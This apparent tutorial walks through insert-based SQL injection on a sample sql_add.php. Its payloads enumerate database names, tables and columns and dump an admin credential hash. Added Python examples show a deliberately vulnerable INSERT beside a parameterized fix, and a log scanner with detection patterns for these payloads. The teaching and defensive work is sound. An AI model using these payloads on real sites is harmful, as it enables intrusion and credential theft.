0x00 Overview

The value obtained by the injection is saved into the database, so it can be read back wherever the stored row is displayed (the echo point).

0x01 Database version / current connected user / current database

Web request: http://www.test.com/sql_add.php?data=user()

Database statement: INSERT INTO test (test) value (user())

Replace user() with database() or @@VERSION as needed.

mysql> select * from test order by id desc limit 1;
+----+----------------+------+---------+
| id | test           | map  | content |
+----+----------------+------+---------+
| 23 | root@localhost | NULL | NULL    |
+----+----------------+------+---------+
1 row in set (0.00 sec)
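The root cause behind every step on this page is that sql_add.php is assumed to splice the data parameter straight into the INSERT statement text, so a sub-select sent as the parameter is executed and its result is what gets stored. The following is an added example, not code from the original page: it models that flaw in Python with an in-memory sqlite3 database (standing in for MySQL, so the catalogue table is sqlite_master rather than information_schema) and puts the parameterized fix beside it. The table layout, the payload and the stored credential row are constructed for the demonstration.

```python
import sqlite3

# Constructed stand-in for the page's `data` parameter: a sub-select of the
# same shape as the information_schema payloads. sqlite3 replaces MySQL here,
# so the catalogue table is sqlite_master, not information_schema.tables.
PAYLOAD = "(select name from sqlite_master where type='table' order by name limit 0,1)"


def make_db():
    """In-memory database with the two tables the page's examples use (constructed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tdb_admin (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("CREATE TABLE test (id INTEGER PRIMARY KEY, test TEXT, map TEXT, content TEXT)")
    conn.execute("INSERT INTO tdb_admin (username, password) VALUES ('admin', 'constructed-hash')")
    return conn


def last_stored_value(conn):
    """What a page that echoes the newest row of `test` would show."""
    return conn.execute("SELECT test FROM test ORDER BY id DESC LIMIT 1").fetchone()[0]


def insert_vulnerable(conn, data):
    """Splices the parameter into the statement text: the flaw the page relies on.

    Assumption: sql_add.php builds its INSERT the same way.
    """
    conn.execute(f"INSERT INTO test (test) VALUES ({data})")
    return last_stored_value(conn)


def insert_parameterized(conn, data):
    """Binds the parameter; the database receives it as a value, never as SQL."""
    conn.execute("INSERT INTO test (test) VALUES (?)", (data,))
    return last_stored_value(conn)


if __name__ == "__main__":
    conn = make_db()
    # The sub-select runs and a table name is stored.
    print("vulnerable   :", insert_vulnerable(conn, PAYLOAD))      # tdb_admin
    # The payload is stored verbatim as text; nothing inside it is evaluated.
    print("parameterized:", insert_parameterized(conn, PAYLOAD))  # (select name from ...)
```

The parameterized form is the fix for the whole page, not just this section: once the value is bound rather than concatenated, the LIMIT, table_schema and concat() variations described below all end up stored as inert strings.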

0x02 Database names

Note: changing the offset in LIMIT returns other database names.
For example:
LIMIT 0,1 (offset 0) returns the 1st database
LIMIT 1,1 (offset 1) returns the 2nd database

Web request: http://www.test.com/sql_add.php?data=(select schema_name from information_schema.schemata limit 1,1)

Database statement: INSERT INTO test (test) value ((select schema_name from information_schema.schemata limit 1,1))

mysql> select * from test order by id desc limit 1;
+----+-------+------+---------+
| id | test  | map  | content |
+----+-------+------+---------+
| 24 | 74cms | NULL | NULL    |
+----+-------+------+---------+
1 row in set (0.00 sec)

0x03 Table names of a database

Note: changing table_schema=xxx to another database returns that database's tables.
For example:
table_schema=database() returns the tables of the currently connected database
table_schema='test' returns the tables of the test database

Note: changing the offset in LIMIT returns a different table name.
For example:
LIMIT 0,1 (offset 0) returns the 1st table
LIMIT 1,1 (offset 1) returns the 2nd table

Web request: http://www.test.com/sql_add.php?data=(select table_name from information_schema.tables where table_schema=DATABASE() limit 0,1)

Database statement: INSERT INTO test (test) value ((select table_name from information_schema.tables where table_schema=DATABASE() limit 0,1))

mysql> select * from test order by id desc limit 1;
+----+-----------+------+---------+
| id | test      | map  | content |
+----+-----------+------+---------+
| 25 | tdb_admin | NULL | NULL    |
+----+-----------+------+---------+
1 row in set (0.00 sec)

0x04 Column names of a table

table_schema = "xx": the database to inspect
table_name = "xx": the table to inspect

The LIMIT offset selects which column is returned.
For example, if the columns of table tdb_admin are id, username, password:
limit 0 = id
limit 1 = username
limit 2 = password

Web request: http://www.test.com/sql_add.php?data=(select column_name from information_schema.columns where table_schema=DATABASE() AND table_name='tdb_admin' limit 1,1)

Database statement (dumping the column names of table tdb_admin in the test database): INSERT INTO test (test) value ((select column_name from information_schema.columns where table_schema=DATABASE() AND table_name='tdb_admin' limit 1,1))

mysql> select * from test order by id desc limit 1;
+----+----------+------+---------+
| id | test     | map  | content |
+----+----------+------+---------+
| 26 | username | NULL | NULL    |
+----+----------+------+---------+
1 row in set (0.00 sec)

0x05 Inserting the contents of the target table

Note: the LIMIT offset selects which row is displayed.
limit 0 is the first row
limit 1 is the second row

Web request: http://www.test.com/sql_add.php?data=(select concat(0x7e,id,0x3a,username,0x3a,password,0x7e) from test.tdb_admin limit 0,1)

Database statement (字段名 = column name, 库名.表名 = database.table): INSERT INTO test (test) value ((select concat(0x7e,字段名,0x3a,字段名,0x3a,字段名,0x7e) from 库名.表名 limit 0,1))

mysql> select * from test order by id desc limit 1;
+----+--------------------------------------------+------+---------+
| id | test                                       | map  | content |
+----+--------------------------------------------+------+---------+
| 28 | ~1:admin:7fef6171469e80d32c0559f88b377245~ | NULL | NULL    |
+----+--------------------------------------------+------+---------+
1 row in set (0.00 sec)
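Because every payload on this page travels in a single GET parameter, the requests are easy to spot in the web server's access log. The following added example (not part of the original page) scans Apache combined-format log lines, decodes the data parameter of requests to sql_add.php and flags the four shapes used in sections 0x01 to 0x05: bare MySQL builtins such as user(), a parenthesised sub-select, references to information_schema, and concat() with hex separators. The log lines, IPs and timestamps are constructed for the demonstration; the file name sql_add.php is taken from the page.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines in Apache combined format. The request shapes
# mirror the page's sections 0x01, 0x02 and 0x05; IPs and times are made up.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /sql_add.php?data=hello%20world HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [01/Jan/2024:10:00:01 +0000] "GET /sql_add.php?data=user() HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /sql_add.php?data=(select%20schema_name%20from%20information_schema.schemata%20limit%201,1) HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /sql_add.php?data=(select%20concat(0x7e,id,0x3a,username,0x3a,password,0x7e)%20from%20test.tdb_admin%20limit%200,1) HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
]

# Client IP and request target out of a combined-format line.
REQUEST_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (?P<target>\S+) HTTP/')

# Each rule is (label, pattern); patterns run against the URL-decoded value.
RULES = [
    ("mysql-builtin", re.compile(r"\b(?:user|database|version)\s*\(\s*\)|@@version", re.I)),
    ("subselect", re.compile(r"\(\s*select\b.*\bfrom\b", re.I | re.S)),
    ("information_schema", re.compile(r"\binformation_schema\.", re.I)),
    ("hex-concat", re.compile(r"\bconcat\s*\(.*\b0x[0-9a-f]{2,}", re.I | re.S)),
]


def data_param(line):
    """Return (client ip, decoded `data` parameter) or None if the line has neither."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    query = urlsplit(m.group("target")).query
    values = parse_qs(query, keep_blank_values=True).get("data")
    if not values:
        return None
    return m.group("ip"), values[0]


def classify(value):
    """Labels of every rule the decoded parameter value matches, in RULES order."""
    return [label for label, pattern in RULES if pattern.search(value)]


def scan(lines):
    """Flagged requests only: one dict per suspicious line with ip, value and reasons."""
    hits = []
    for line in lines:
        parsed = data_param(line)
        if parsed is None:
            continue
        ip, value = parsed
        reasons = classify(value)
        if reasons:
            hits.append({"ip": ip, "value": value, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["ip"], ", ".join(hit["reasons"]), "->", hit["value"])
```

Decoding the parameter before matching matters: the percent-encoded form of `select ... from` never contains a literal space, so a pattern run over the raw line would miss it. The rules are deliberately narrow to the shapes shown on this page; a benign value that legitimately contains the word "select" would still be worth a second look rather than an automatic block.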